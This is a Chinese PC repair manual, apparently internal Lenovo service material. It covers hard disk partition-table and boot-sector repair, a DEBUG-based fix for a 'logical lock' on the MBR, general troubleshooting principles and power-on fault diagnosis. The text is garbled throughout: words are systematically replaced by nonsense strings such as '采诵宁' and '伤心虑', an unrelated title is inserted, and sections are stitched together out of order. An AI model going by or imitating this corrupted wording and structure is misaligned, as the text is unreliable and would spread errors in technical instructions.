分区表错误是硬盘的严重错误，不同错误的程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过fdisk重置活动分区进行修复。如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32mb的基本DOS分区值为06，而扩展的DOS分区值是05。如果把基本DOS分区类型改为05则无法启动系统，并且不能读写其中的数据。如果把06改为DOS不识别的类型如efh，则DOS认为改分区不是DOS分区，当然无法读写。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。分区表中还有其他数据用于纪录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复，唯一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据，否则将导致其他的数据永久的丢失。在对主引导扇区进行操作时，可采用nu等工具软件，操作非常的方便，可直接对硬盘主引导扇区进行读写或编辑。当然也可采用debug进行操作，但操作繁琐并且具有一定的风险。

5、分区有效标志错误引起的硬盘故障
在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节:55aah，此字为扇区的有效标志。当从硬盘，软盘或光区启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此标志时从硬盘启动将转入rombasic或提示放入软盘。从软盘启动时无法转入硬盘。此处可用于整个硬盘的加密技术。可采用debug方法进行恢复处理。另外，DOS引导扇区仍有这样的标志存在，当DOS引导扇区无引导标志时，系统启动将显示为:missingoperatingsystem。其修复的方法可采用的主引导扇区修复方法，只是地址不同，更方便的方法是使用下面的DOS系统通用的修复方法。

6、DOS引导系统引起的启动故障
DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括io.sys、msdos.sys、command.com，其中command.com是DOS的外壳文件，可用其他的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows95携带的DOS系统中，msdos.sys是一个文本文件，是启动windows必须的文件。但只启动DOS时可不用此文件。但DOS引导出错时，可从软盘或光盘引导系统，之后使用sysc:传送系统即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

  7、fat表引起的读写故障
fat表纪录着硬盘数据的存储地址，每一个文件都有一组连接的fat链指定其存放的簇地址。fat表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个fat表，如果目前使用的fat表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其fat表的长度及第二个fat表的地址也是不固定的，所以修复时必须正确查找其正确位置，由一些工具软件如nu等本身具有这样的修复功能，使用也非常的方便。采用debug也可实现这种操作，即采用其m命令把第二个fat表移到第一个表处即可。如果第二个fat表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用chkdsk或scandisk命令进行修复，最终得到*.chk文件，这便是丢失fat链的扇区数据。如果是文本文件则可从中提取并可合并完整的文件，如果是二进制的数据文件，则很难恢复出完整的文件。

  8、目录表损坏引起的引导故障
目录表纪录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号，目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用上面的chkdsk或scandisk程序的方法，从硬盘中搜索出chk文件，由目录表损坏时是首簇号丢失，在fat为损坏的情况下所形成的chk文件一般都比较完整的文件数据，每一个chk文件即是一个完整的文件，把其改为原来的名字可恢复大多数文件。

  9、误删除分区时数据的恢复
当用fdisk删除了硬盘分区之后，表面现象是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示无效驱动器。如果了解fdisk的工作原理，就会知道，fdisk只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容。具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变，可仿造上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区即数据，但这只限于除分区或重建分区之后。如果已经对分区用format格式化，在先恢复分区后，在按下面的方法恢复分区数据。

  10、误格式化硬盘数据的恢复
在DOS高版本状态下，格式化操作format在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区，fat分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行unformatc:即可恢复原来的文件分配表及目录表，从而完成硬盘信息的恢复。另外DOS还提供了一个miror命令用于纪录当前的磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。
硬盘基本知识

9.物理驱动器与逻辑驱动器
    物理驱动器指实际安装的驱动器。
    逻辑驱动器是对物理驱动器格式化后产生的。
要点：同上。
硬盘逻辑锁巧解
在谈论具体的解决方法前，先讲述一下被逻辑锁锁住的硬盘为什么不能用普通办法启 动的原因：

计算机在引导DOS系统时将会搜索所有逻辑盘的顺序，当DOS被引导时，首先要去找主引 导扇区的分区表信息，位于硬盘的零头零柱面的第一个扇区的OBEH地址开始的地方，当 分区信息开始的地方为80H时表示是主引导分区，其他的为扩展分区，主引导分区被定义 为逻辑盘C盘，然后查找扩展分区的逻辑盘，被定义为D盘，以此类推找到E，F，G..... 逻辑锁就是在此下手，修改了正常的主引导分区记录将扩展分区的第一个逻辑盘指向 自己，DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘总是找到是自己，这样一来 就形成了死循环，这就是使用软驱,光驱，双硬盘都不能正常启动的原因。实际上这逻辑锁只是利用了DOS在启动时的一个小小缺陷，便令不少高手都束手无策。知道了逻辑 锁的上锁原理，要解锁也就比较容易了。以前我看到有位朋友采用热拔插硬盘电源的方法来处理：就是在当系统启动时，先不给被锁的硬盘插上电源线，等待启动完成后再给硬盘热插上电源线，这时如果硬盘没有烧坏的话，系统就可以控制硬盘了。当然这是一种非常危险的方法，大家不要轻易尝试，下面介绍两种比较简单和安全的处理方法。

  方法一：修改DOS启动文件
首先准备一张DOS6.22的系统盘，带上debug、pctools5.0、fdisk等工具。然后在一台正常的机器上，使用你熟悉的二进制编辑工具（debug、pctools5.0，或者windows下的ultraedit都行）修改软盘上的IO.SYS文件（修改前记住改该文件的属性为正常），具体是在这个文件里面搜索第一个55aa字符串，找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被黑客程序给恶意修改了，你无法用FDISK来删除和修改分区，而且仍无法用正常的启动盘启动系统，这时你可以用DEBUG来手工恢复。使用DEBUG手工修复硬盘步骤如下：

a:\ >debug
-a
-xxxx:100 mov ax,0201 读一个扇区的内容
-xxxx:103 mov bx,500 设置一个缓存地址
-xxxx:106 mov cx,0001 设置第一个硬盘的硬盘指针
-xxxx:109 mov dx,0080 读零磁头
-xxxx:10c int 13 硬盘中断
-xxxx:10e int 20
-xxxx:0110 退出程序返回到指示符
-g 运行
-d500 查看运行后500地址的内容

这时候会发现地址6be开始的内容是硬盘分区的信息，发现此硬盘的扩展分区指向自己，这就使DOS或WINDOWS启动时查找硬盘逻辑盘进去死循环，在DEBUG指示符下用E命令修改内存数据 具体如下：

E6BE
xx.0 xx.0 xx.0...............
.............................
.......................55 AA
55 AA表示硬盘有效的标记，不要修改，xx0表示把以前的数据xx改成0

再用硬盘中断13把修改好的数据写入硬盘就可以了，具体如下：

A:\ >debug
a 100 表示修改100地址的汇编指令
-xxxx:100 mov ax,0301 写硬盘一个扇区
-xxxx: 这里直接按回车
-g 运行
-q 退出

然后运行 FDISK/MBR（重置硬盘引导扇区的引导程序），再重新启动电脑就行了。 怎么样？用这种方法处理够简单的吧？而且这种方法还有一个好处就是可以保住盘上的 数据！如果你不需要保数据的话，还有更加简单的处理方法：
方法二：巧设BIOS，用DM解锁大家知道DM软件是不依赖于主板BIOS的硬盘识别安装软件，（所以在不能识别大硬盘的老主板上也可用DM来安装使用大容量硬盘）。就算在BIOS中将硬盘设为NONE，DM也可识别并处理硬盘。

首先你要找到和硬盘配套的DM软件（找JS要或去网上荡），然后把DM拷到一张系统盘上。接上被锁硬盘，开机，按住DEL键，进CMOS设置，将所有IDE硬盘设为NONE（这是关键所在!），保存设置，重启动，这时系统即可 带锁启动。启动后运行DM，你会发现DM可以绕过BIOS，识别出硬盘，选中该硬盘，分区格式化，就OK了。这么简单？不过这种 方法的弱点是硬盘上的数据将全部丢失。


来自联想维修站的内部发行资料

《一键清理系统垃圾》

来自联想维修站的内部发行资料

第一部分 总则
第一章 电脑维修的基本原则和方法
第二章 电脑维修步骤与维修操作注意事项

第二部分 常见故障判断
第一章 加电类故障
第二章 启动与关闭类故障
第三章 磁盘类故障
第四章 显示类故障
第五章 安装类故障
第六章 操作与应用类故障
第七章 局域网类故障
第八章 Internet类故障
第九章 端口与外设故障
第十章 音视频类故障
第十一章 兼容类故障

第三部分 附录
硬盘基本知识
挽救硬盘的几个方法
硬盘逻辑锁巧解
WINDOWS蓝色当机画面解读
实用的端口大全(中文版)

第一部分---总则

第一章 电脑维修的基本原则和方法
这里所述原则、方法等是第二部分分类判断的基础，需要认真遵守执行。

§1.1 进行电脑维修应遵循的基本原则：
一、 进行维修判断须从最简单的事情做起
简单的事情，一方面指观察，另一方面是指简捷的环境。
简单的事情就是观察，它包括：
1、 电脑周围的环境情况--位置、电源、连接、其它设备、温度与湿度等；
2、 电脑所表现的现象、显示的内容，及它们与正常情况下的异同；
3、 电脑内部的环境情况--灰尘、连接、器件的颜色、采诵宁的形状、指示灯的状态等；
4、 电脑的软硬件配置--安装了何种硬件，资源的使用情况；使用的是使种操作系统，其上又安装了何种应用软件；硬件的设置驱动程序版本等。
简捷的环境包括：
1、 后续将提到的最小系统；
2、 在判断的环境中，仅包括基本的运行采诵宁/软件，和被怀疑有故障的采诵宁/软件；
3、 在一个干净的系统中，添加用户的应用（硬件、软件）来进行分析判断
从简单的事情做起，有利于精力的集中，有利于进行故障的判断与定位。一定要注意，必须通过认真的观察后，才可进行判断与维修
二、 根据观察到的现象，要先想后做
先想后做，包括以下几个方面：
首先是，先想好怎样做、从何处入手，再实际动手。也可以说是先分析判断，再进行维修。
其次是，对于所观察到的现象，尽可能地先查阅相关的资料，看有无相应的技术要求、使用特点等，然后根据查阅到的资料，结合下面要谈到的内容，再着手维修。
最后是，在分析判断的过程中，要根据自身已有的知识、经验来进行判断，对于自己不太了解或根本不了解的，一定要先向有经验的同事或你的技术支持工程师咨询，寻求帮助。
三、 在大多数的电脑维修判断中，必须先软后硬：
即从整个维修判断的过程看，总是先判断是否为软件故障，先检查软件问题，当可判软件环境是正常时，如果故障不能消失，再从硬件方面着手检查。
四、 在维修过程中要分清主次，即抓主要矛盾
在复现故障现象时，有时可能会看到一台故障机不止有一个故障现象，而是有两个或两个以上的故障现象（如：启动过程中无显，但机器也在启动，同时启动完后，有死机的现象等），为时，应该先判断、维修主要的故障现象，当修复后，再维修次要故障现象，有时可能次要故障现象已不需要维修了。

§1.2 电脑维修的基本方法
一、观察法
观察，是维修判断过程中第一要法，它贯穿于整个维修过程中。观察不仅要认真，而且要全面。要观察的内容包括：
1、 周围的环境；
2、 硬件环境。包括接插头、座和槽等；
3、 软件环境；
4、 用户操作的习惯、过程
二、最小系统法
最小系统是指，从维修判断的角度能使电脑开机或运行的最基本的硬件和软件环境。最小系统有两种形式：
硬件最小系统：由电源、主板和CPU组成。在这个系统中，没有任何信号线的连接，只有电源到主板的电源连接。在判断过程中是通过声音来判断这一核心组成部分是否可正常工作；
软件最小系统：由电源、主板、CPU、内存、显示卡/显示器、键盘和硬盘组成。这个最小系统主要用来判断系统是否可完成正常的启动与运行。
对于软件最小环境，就软件有以下几点要说明：
1、 硬盘中的软件环境，保留着原先的软件环境，只是在分析判断时，根据需要进行隔离如卸载、屏蔽等）。保留原有的软件环境，主要是用来分析判断应用软件方面的问题
2、 硬盘中的软件环境，只有一个基本的操作系统环境（可能是卸载掉所有应用，或是重新安装一个干净的操作系统），然后根据分析判断的需要，加载需要的应用。需要使用一个干净的操作系统环境，是要判断系统问题、软件冲突或软、硬件间的冲突问题。
3、 在软件最小系统下，可根据需要添加或更改适当的硬件。如：在判断启动故障时，由于硬盘不能启动，想检查一下能否从其它驱动器启动。这时，可在软件最小系统下加入一个软驱或干脆用软驱替换硬盘，来检查。又如：在判断音视频方面的故障时，应需要在软件最小系统中加入声卡；在判断网络问题时，就应在软件最小系统中加入网卡等。
最小系统法，主要是要先判断在最基本的软、硬件环境中，系统是否可正常工作。如果不能正常工作，即可判定最基本的软、硬件采诵宁有故障，从而起到故障隔离的作用。
最小系统法与逐步添加法结合，能较快速地定位发生在其它板软件的故障，提高维修效率。
三、逐步添加/去除法
逐步添加法，以最小系统为基础，每次只向系统添加一个采诵宁/设备或软件，来检查故障现象是否消失或发生变化，以此来判断并定位故障部位。
逐步去除法，正好与逐步添加法的操作相反。
逐步添加/去除法一般要与替换法配合，才能较为准确地定位故障部位。
四、隔离法
是将可能防碍故障判断的硬件或软件屏蔽起来的一种判断方法。它也可用来将怀疑相互冲突的硬件、软件隔离开以判断故障是否发生变化的一种方法。
上提到的软硬件屏蔽，对于软件来说，即是停止其运行，或者是卸载；对于硬件来说，是在设备管理器中，禁用、卸载其驱动，或干脆将硬件从系统中去除。
五、替换法
替换法是用好的采诵宁去代替可能有故障的采诵宁，以判断故障现象是否消失的一种维修方法。好的采诵宁可以是同型号的，也可能是不同型号的。替换的顺序一般为：
1、 根据故障的现象或第二部分中的故障类别，来伤心虑需要进行替换的采诵宁或设备；
2、 按先简单后复杂的顺序进行替换。如：先内存、CPU，后主板，又如要判断打印故障时，可先伤心虑打印驱动是否有问题，再伤心虑打印电缆是否有故障，最后伤心虑打印机或并口是否有故障等；
3、 最先伤心查与怀疑有故障的采诵宁相连接的连接线、信号线等，之后是替换怀疑有故障的采诵宁，再后是替换供电采诵宁，最后是与之相关的其它采诵宁。
4、 从采诵宁的故障率高低来伤心虑最先替换的采诵宁。故障率高的采诵宁先进行替换。
六、比较法
比较法与替换法类似，即用好的采诵宁与怀疑有故障的采诵宁进行外观、配置、运行现象等方面的比较，也可在两台电脑间进行比较，以判断故障电脑在环境设置，硬件配置方面的不同，从而找出故障部位。
七、升降温法
在上门服务过程中，升降温法由于工具的限制，其使用与维修间是不同的。在上门服务中的升温法，可在用户同意的情况下，设法降低电脑的通风能力，伤心电脑自身的发热来升温；降温的方法有：1）一般选择环境温度较低的时段，如一清早或较晚的时间；2）使电脑停机12~24小时以上等方法实现；3）用电风扇对着故障机吹，以加快降温速度。
八、敲打法
敲打法一般用在怀疑电脑中的某采诵宁有接触不良的故障时，通过振动、适当的扭曲，甚或用橡胶锤敲打采诵宁或设备的特定采诵宁来使故障复现，从而判断故障采诵宁的一种维修方法。
九、对电脑产品进行清洁的建议
有些电脑故障，往往是由于机器内灰尘较多引起的，这就要求我们在维修过程中，注意观察故障机内、外部是否有较多的灰尘，如果是，应该先进行除尘，再进行后续的判断维修。在进行除尘操作中，以下几个方面要特别注意：
1、 注意风道的清洁
2、 注意风扇的清洁
风扇的清洁过程中，最好在清除其灰尘后，能在风扇轴处，点一点儿钟表油，加强润滑。
3、 注意接插头、座、槽、板卡金手指部分的清洁
金手指的清洁，可以用橡皮擦拭金手指部分，或用酒精棉擦拭也可以。
插头、座、槽的金属引脚上的氧化现象的去除： 一是用酒精擦拭，一是用金属片（如小一字改锥）在金属引脚上轻轻刮擦。
4、 注意大规模集成电路、元器件等引脚处的清洁
清洁时，应用小毛刷或吸尘器等除掉灰尘，同时要观察引脚有无虚焊和潮湿的现象，元器件是否有变形、变色或漏液现象。
5、 注意使用的清洁工具
清洁用的工具，首先是防静电的。如清洁用的小毛刷，应使用天然材料制成的毛刷，禁用塑料毛刷。其次是如使用金属工具进行清洁时，必须切断电源，且对金属工具进行泄放静电的处理。
用于清洁的工具包括：小毛刷、皮老虎、吸尘器、抹布、酒精（不可用来擦拭机箱、显示器等的塑料外壳）。
6、 对于比较潮湿的情况，应想办法使其干燥后再使用。可用的工具如电风扇、电吹风等，也可让其自然风干。
十、软件调试的几个方法和建议
1、 操作系统方面。
主要的调整内容是操作系统的启动文件、系统配置参数、组件文件、病毒等。
修复操作系统启动文件。
1) 对于Windows 9x系统，可用SYS命令来修复（要保证MSDOS.SYS的大小在1KB以上），但要求，在修复之前应保证分区参数是正确的。这可使用诸如DiskMap之类的软件实现；
2) 对于Windows 2000/XP系统，有两种方法--修复启动文件，使用fixboot命令；修复主引导记录，使用fixmbr命令。
调整操作系统配置文件。
A. 对于Windows 9x系统，可用的工具很多，如：Msconfig命令、系统文件检查器、注册表备份和恢复命令（scanreg.exe，它要求在DOS环境下运行。另外如果要用scanreg.exe恢复注册表，最好使用所列出的恢复菜单中的第二个备份文件）等；
B. 对于Windows 2000系统，可用的工具与Windows 9x相比比较少，但某些调试命令可用Win98中的一些命令（如win98下的Msconfig命令，就可用在windows 2000下）；
C. 对于Windows XP系统，可用的工具主要是Msconfig命令；
D. 调整电源管理和有关的服务，可以使用的命令是，要运行文本框中输入gpedit.msc来进行；
E. 所有操作系统的调试，都可通过控制面板、设备管理器、计算机管理器（Windows 9x系统无）来进行系统的调试。
组件文件（包括.DLL、.VXD等）的修复
A. 通过添加删除程序来重新安装；
B. 通过从.CAB文件中提取安装；
C. 可用系统文件检查器（sfc.exe命令）来修复有错误的文件；
D. 从好的机器上拷贝覆盖。
检查系统中的病毒。
建议使用命令行方式下的病毒查杀软件，并能直接访问诸如NTFS分区。
2、 设备驱动安装与配置方面。
主要调整设备驱动程序是否与设备匹配、版本是否合适、相应的设备在驱动程序的作用下能否正常响应。
A. 最好先由操作系统自动识别（特别要求的除外，如一些有特别要求的显示卡驱动、声卡驱动、非即插即用设备的驱动等），而后伤心虑强行安装。这样有利于判断设备的好坏；
B. 如果有操作系统自带的驱动，则先使用，仍不能正常或不能满足应用需要，则使用设备自带的驱动；
C. 更换设备，应先卸载驱动再更换。卸载驱动，可从设备管理器中卸载；再从安全模式下卸载；进而在INF目录中删除；最后通过注册表卸载；
D. 更新驱动时，如直接升级有问题，须先卸载再更新。
3、 磁盘状况方面。
检查磁盘上的分区是否能访问、介质是否有损坏、保存在其上的文件是否完整等。
可用的调整工具：
A. DiskMap，方便地找回正确的分区；
B. Fdisk及Fdisk /MDR，检查分区是否正确及使主引导记录恢复到原始状态；
C. 当硬盘容量大于64GB时，如果要重新分区或查看分区，要求使用随机附带的磁盘分区软盘中的Fdisk命令。这个命令可用windows Me下的Fdisk命令来代替；
D. format、Scandisk、厂商提供的磁盘检测程序，检查磁盘介质是否有坏道；
E. 文件不完整时，要求对不完整的文件先进行改名，再用在操作系统方面中所述的方法重建。
4、 应用软件方面。
如应用软件是否与操作系统或其它应用有兼容性的问题、使用与配置是否与说明手册中所述的相符、应用软件的相关程序、数据等是否完整等；
5、 BIOS设置方面。
1) 在必要时应先恢复到最优状态。建议：在维修时先把BIOS恢复到最优状态（一般是出厂时的状态），然后根据应用的需要，逐步设置到合适值。
2) BIOS刷新不一定要刷新到最新版，有时应伤心虑降低版本。
6、 重建系统。
在硬件配置正确，并得到用户许可时，可通过重建系统的方法来判断操作系统之类软件故障，在用户不同意的情况下，建议使用自带的硬盘，来进行重建系统的操作。在这种情况下，最好重建系统后，逐步复原到用户原硬盘的状态，以便判断故障点。
1) 重建系统，须以一键恢复为主，其次是恢复安装，最后是完全重新安装。恢复安装的方法：
对于Windows 9x系统，直接从光盘安装，或执行tools\sysrec\pcrestor.bat，即可实现恢复安装。在进行恢复安装时，可能由于win.com的存在而影响安装过程的正常进行，这时，可在Windows目录下，删除win.com后，再重新安装。
另一种恢复安装，是将根目录下的System.1st改名为System.dat后覆盖掉Windows目录下的同名文件，之后重启即可。但这种方法，不是真正意义上的重新安装，而类似于完全重新安装。
对于Windows XP或Windows2000系统，直接使用其安装光盘启动，在安装界面中选择修复安装，选择R时会出现两个选项：一是快速修复，对于简单问题用此选择；另一是故障修复台，只要选择正确的安装目录就可启用故障修复台。故障修复台界面类似于DOS界面。
2) 为保证系统干净，在安装前，执行Fdisk /MBR命令（也可用Clear.com）。必要时，在此之后执行format <驱动器盘符 > /u [/s]命令。
3) 一定要使用随机版的或正版的操作系统安装介质进行安装。

第二章 电脑维修步骤与维修操作注意事项
§2.1 电脑维修步骤
对电脑进行维修，应遵循如下步骤：
一、了解情况
即在服务前，与用户沟通，了解故障发生前后的情况，进行初步的判断。如果能了解到故障发生前后尽可能详细的情况，将使现场维修效率及判断的准确性得到提高。了解用户的故障与技术标准是否有冲突。
向用户了解情况，应借助第二部分中相关的分析判断方法，与用户交流。这样不仅能初步判断故障部位，也对准备相应的维修备件有帮助。
二、复现故障
即在与用户充分沟通的情况下，确认：
1. 用户所报修故障现象是否存在，并对所见现象进行初步的判断，确定下一步的操作；
2. 是否还有其它故障存在。
三、判断、维修
即对所见的故障现象进行判断、定位，找出产生故障的原因，并进行修复的过程。在进行判断维修的过程中，应遵循下面一节维修判断中所述的原则、方法、注意事项，及第二、三部分所述内容进行操作。
四、检验
1. 维修后必须进行检验，确认所复现或发现的故障现象解决，且用户的电脑不存在其它可见的故障。电脑整机正常的标准，参见《联想台式电脑整机检验规范》；
2. 必须按照《XX维修检验确认单》所列内容，进行整机验机，尽可能消除用户未发现的故障，并及时排除之。
§2.2 电脑维修操作
在维修过程中，下列各条款应引起切实的关注和注意。
一、在进行故障现象复现、维修判断的过程中，应避免故障范围扩大；
二、在维修时，须查验、核对装箱单及配置；
三、必须充分地与用户沟通。了解用户的操作过程、出故障时所进行过的操作、用户使用电脑的水平等。
四、维修中第一要注意的就是观察--观察、观察、再观察！！！
1. 周围环境：电源环境、其它高功率电器、电、磁场状况、机器的布局、网络硬件环境、温湿度、环境的洁净程度；安放电脑的台面是否稳固。周边设备是否存在变形、变色、异味等异常现象；
2. 硬件环境：机箱内的清洁度、温湿度，采诵宁上的跳接线设置、颜色、形状、气味等，采诵宁或设备间的连接是否正确；有无错误或错接、缺针/断针等现象；用户加装的与机器相连的其它设备等一切可能与机器运行有关的其它硬件设施；
3. 软件环境：
A. 系统中加载了何种软件、它们与其它软、硬件间是否有冲突或不匹配的地方；
B. 除标配软件及设置外，要观察设备、主板及系统等的驱动、补丁是否安装、是否合适；要处理的故障是否为业内公认的BUG或兼容问题；用户加装的其它应用与配置是否合适；
4. 加电过程中的观察：元器件的温度、异味、是否冒烟等；系统时间是否正确；
5. 拆装采诵宁时的观察：要有记录采诵宁原始安装状态的好习惯，且要认真观察采诵宁上元器件的形状、颜色、原始的安装状态等情况；
6. 观察用户的操作过程和习惯，及是否符合要求等。
五、在维修前，如果灰尘较多，或怀疑是灰尘引起的，应先除尘
六、对于自己不熟悉的应用或设备，应在认真阅读用户使用手册或其它相关文档后，才可动手操作。
七、平时要多注意通过《技术直通车》、《技术工程信息通报》等下发的技术资料及其他工程师们的经验来积累自己的经验和提高维修水平。
八、禁止维修工程师为用户安装地线。如用户要安装地线，请用户联系正式电工为其安装。
九、如果要通过比较法、替换法进行故障判断的话，应先征得用户的同意。
十、在进行维修判断的过程中，如有可能影响到用户所存储的数据，一定要在做好备份、或保护措施、并征得用户同意后，才可继续进行。
十一、当出现大批量的相似故障（不仅是可能判断为批量的故障）时，一定要对周围的环境、连接的设备，以及与故障采诵宁相关的其它采诵宁或设备进行认真的检查和记录，以找出引起故障的根本原因。
十二、随机性故障的处理思路。随机性故障是指：随机性死机、随机性报错、随机性出现不稳定现象。对于这类故障的处理思路应该是：
1. 慎换硬件，特别是上门服务时。一定要在充分的软件调试和观察后，在一定的分析基础上进行硬件更换。如果没有把握，最好在维修站内进行硬件更换操作。
2. 以软件调整为主。调整的内容有：
1） 设置BIOS为出厂状态（注意BIOS开关位置）
2） 查杀病毒
3） 调整电源管理
4） 调整系统运行环境
5） 必要时做磁盘整理，包括磁盘碎片整理、无用文件的清理及介质检查（注意，应在检查磁盘分区正常及分区中空余空间足够的情况下进行）。
6） 确认有无用户自加装的软硬件，如果有，确认其性能的完好性/兼容性。
7） 与无故障的机器比较、对比。这种对比的一种方法是，在一台配置与故障机相同的无故障机器上，逐个插入故障机中的采诵宁（包括软件），查看无故障机的变化，当在插入某采诵宁后，无故障机出现了与故障机类似的现象，可判该采诵宁有故障。注意这种方式的对比，应做得彻底，以防漏掉可能有两种采诵宁引起同一故障的情况。
十三、应努力学习相关技术知识、掌握操作系统的安装、使用方法及配置工具的使用等；理解各配置参数的意义与适用的范围。
十四、请求支持需要关注的内容
1. 硬件及配置信息（尽可能详尽）
2. 软件及配置信息（尽可能详尽）
3. 周围环境
4. 完整的故障现象描述。即用户第一次报修时的故障现象，经过维修操作后故障现象的变化情况。（清晰的描述）
5. 做过的维修操作（要详尽）

§2.3 电脑维修的基本思路
为帮助维修工程师，顺利找到第二部分中的相关内容，在这里列出基本的判断思路，供参伤心使用。
第二部分 常见故障判断
本部分将计算机从开机一直到关机期间的故障进行分类。每一类的判断、定位过程都是第一部分中维修判断一节的有机组成部分，即不论使用什么方法或不论去判断什么内容，这两部分总是相互结合使用的。
以下各故障类型中所列的故障现象只是众多故障现象中的一部分，对于未列出的故障现象，有的可归类到其中，有的无法归类。因此，本手册只针对已列出的及可归类其中的故障现象提供相应的判断的方法和思路，并提供基本的排除的方法。而对不能归类其中的其它故障现象来说，我们会在今后的工作中不断的收集、整理总结，然后对本《台式电脑维修指导手册》进行丰富。
第一章 加电类故障
一、定义举例
从上电（或复位）到自检完成这一段过程中电脑所发生的故障。
二、可能的故障现象
1、 主机不能加电（如：电源风扇不转或转一下即停等）、有时不能加电、开机掉闸、机箱金属部分带电等；
2、 开机无显，开机报警；
3、 自检报错或死机、自检过程中所显示的配置与实际不符等；
4、 反复重启；
5、 不能进入BIOS、刷新BIOS后死机或报错；CMOS掉电、时钟不准；
6、 机器噪音大、自动（定时）开机、电源设备问题等其它故障。
三、可能涉及的采诵宁
市电环境；电源、主板、CPU、内存、显示卡、其它可能的板卡；BIOS中的设置（可通过放电来回复到出厂状态）；开关及开关线、复位按钮及复位线本身的故障。
四、判断要点/顺序。
以下的文字叙述部分是对维修判断流程的补充和说明，要结合流程图来阅读。另外，本章只分析加电类的故障，如果在判断中涉及其它类故障，可转入相应故障的判断过程。以下各类同。
1、 维修前的准备
1) POST卡；
2) 万用表；
3) 试电笔；
4) CPU负载。
2、 环境检查
1) 检查电脑设备：
A. 周边及电脑设备内外是否有变形、变色、异味等现象；
B. 环境的温、湿度情况；
C. 加电后，注意采诵宁、元器件及其它设备是否变形、变色、异味、温度异常等现象发生。
2) 检查市电情况：
A. 检查市电电压是否在220V±10%范围内，是否稳定（即是否有经常停电、瞬间停电等现象）；
B. 市电的接线定义是否正确（即，左零右火、不允许用零线作地线用（现象是零地短接）、零线不应有悬空或虚接现象）；
C. 供电线路上是否接有漏电保护器（且必须接地火线上），是否有地线等；
D. 主机电源线一端是否牢伤心地插在市电插座中，不应有过松或插不到位的现象，另一端是否可伤心在接在主机电源上，不应有过松或插不到位的情况。
3) 检查电脑内部连接：
A. 电源开关可否正常的通断，声音清晰，无连键、接触不良现象；
B. 其它各按钮、开关通断是否正常；
C. 连接到外部的信号线是否有断路、短路等现象；
D. 主机电源是否已正确地连接在各主要采诵宁，特别是主板的相应插座中；
E. 板卡，特别是主板上的跳接线设置是否正确。
4) 检查采诵宁安装：
A. 检查机箱内是否有异物造成短路；
B. 或零采诵宁安装上是否造成短路（如P4CPU风扇在主板背面的支架安装错位造成的短路等）；
C. 通过重新插拔采诵宁（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查采诵宁安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；
D. 检查内存的安装，要求内存的安装总是从第一个插槽开始顺序安装。如果不是这样，请重新插好。
5) 检查加电后的现象：
A. 按下电源开关或复位按钮时，观察各指示灯是否正常闪亮；
B. 风扇（电源的和CPU的等）的工作情况，不应有不动作或只动作一下即停止的现象；
C. 注意倾听风扇、驱动器等的电机是否有正常的运转声音或声音是否过大；
D. 主机能加电，但无显示，应倾听主机能否正常自检（即有自检完成的鸣叫声，且硬盘灯能不断闪烁）若有，先检查显示系统是否有故障，否则检查主机问题；
E. 对于开机噪音大的问题，应分辨清噪音大的部位，一般情况下，噪音大的采诵宁有风扇、硬盘、光驱和软驱动机械采诵宁。对于风扇，应通过除尘来检查，如果噪音减小，可在风扇轴处滴一些钟表油，以加强润滑。

3、 故障判断要点
1) 检查主机电源：
A. 主机电源在不接负载时，将电源到主板的插头中绿线与黑线直接短接，看能否加电，并用万用表检查是否有电压输出；
B. 用万用表检查输出的各路电压值是否在规格允许的范围内；
C. 在接有负载的情况下，用万用表检查输出电源的波动范围是否在超出允许范围；
D. 对于电源一加电，只动作一下即停止工作的情况，应首先判断电源空载或接在其它机器上是否能正常工作（即检查上面提到的三点）；
E. 如果电脑的供电不是直接从市电来，而是通过稳压设备获得，要注意用户所用的稳压设备是否完好、或是否与我们的产品的电源兼容。
2) 在开机无显时，用POST卡检查硬件最小系统中的采诵宁是否正常
A. 查看POST显示的代码是否为正常值（参见《维修工具使用手册》中的代码定义）；
B. 对于POST卡所显示的代码，应检查与之相关的所有采诵宁。如显示的代码与内存有关，就应检查主板和内存；
C. 倾听在硬件最小系统下，有无报警声音，若无检查的重点应在最小系统中的采诵宁上；
D. 检查中还应注意的是，当硬件最小系统有报警声时，要求插入无故障的内存和显示卡（集成显示卡除外），若此时没有报警音，且有显示或自检完成的声音，证明硬件最小系统中的采诵宁基本无故障，否则，应主要检查主板；
E. 在准备更换CPU来检查时，应先使用CPU负载，检查主板的供电电压是否在允许范围内，在电压正常的情况下才可进行CPU更换操作。如果超出范围，直接更换主板。CPU电压允许值参见《维修工具使用手册》；
3) 采诵宁的检查：
A. 如果硬件最小系统中的采诵宁经POST卡检查正常后，要逐步加入其它的板卡及设备，以检查其中哪个采诵宁或设备有问题；
